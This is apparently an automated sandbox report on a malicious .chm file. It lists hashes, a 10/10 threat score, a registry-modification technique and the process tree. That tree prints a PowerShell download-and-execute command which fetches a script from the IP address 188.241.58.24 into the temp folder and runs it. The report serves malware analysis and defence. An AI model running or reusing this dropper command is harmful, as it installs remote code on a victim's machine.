336be3a20ae8a36962ffd26b1ec7fb0ec2274a860dd9423b16ff817d29f1908a

Analysis

max time kernel
0s
max time network
122s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
01-01-2024 15:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

93dc1dee6b92da2fe38858162e039eb54ce5e109286432cb3a55c06818eff61a.chm
Size

20KB
MD5

d0f8b99970cbe34b5fe6492d66340edf
SHA1

05953d775679f3effed1cbeb429218797899a62d
SHA256

93dc1dee6b92da2fe38858162e039eb54ce5e109286432cb3a55c06818eff61a
SHA512

718b8dd293806ee92f43f560dac3ebc48d27f7483b97aacd13f17b83e13e251d7e2d10b5f98f1ec61b3536d9de49e7ab09050d75d227429bcaaffbed1bdc8121
SSDEEP

384:gpabv3H87wzhdfl5COJNnZf1l4StghfeTqKrLWj:gpytzhdflQOJ3fwSasp2

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://188.241.58.24/zae/br.css

Signatures

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Main	hh.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2928	hh.exe
2928	hh.exe

C:\Windows\hh.exe
"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\93dc1dee6b92da2fe38858162e039eb54ce5e109286432cb3a55c06818eff61a.chm
1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2928
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell (new-object System.Net.WebClient).DownloadFile('http://188.241.58.24/zae/br.css','%TEMP%\br.wsf'); Start-Process '%TEMP%\br.wsf'
  2⤵
  PID:2148

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (new-object System.Net.WebClient).DownloadFile('http://188.241.58.24/zae/br.css','C:\Users\Admin\AppData\Local\Temp\br.wsf'); Start-Process 'C:\Users\Admin\AppData\Local\Temp\br.wsf'
1⤵
PID:2020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2020-10-0x0000000001E90000-0x0000000001E98000-memory.dmp

Filesize
32KB

Download
memory/2020-9-0x000000001B640000-0x000000001B922000-memory.dmp

Filesize
2.9MB

Download
memory/2020-12-0x0000000002B90000-0x0000000002C10000-memory.dmp

Filesize
512KB

Download
memory/2020-11-0x000007FEF37A0000-0x000007FEF413D000-memory.dmp

Filesize
9.6MB

Download
memory/2020-16-0x0000000002B90000-0x0000000002C10000-memory.dmp

Filesize
512KB

Download
memory/2020-18-0x0000000002B90000-0x0000000002C10000-memory.dmp

Filesize
512KB

Download
memory/2020-13-0x000007FEF37A0000-0x000007FEF413D000-memory.dmp

Filesize
9.6MB

Download
memory/2020-34-0x000007FEF37A0000-0x000007FEF413D000-memory.dmp

Filesize
9.6MB

Download
memory/2928-30-0x000007FFFFF80000-0x000007FFFFF90000-memory.dmp

Filesize
64KB

Download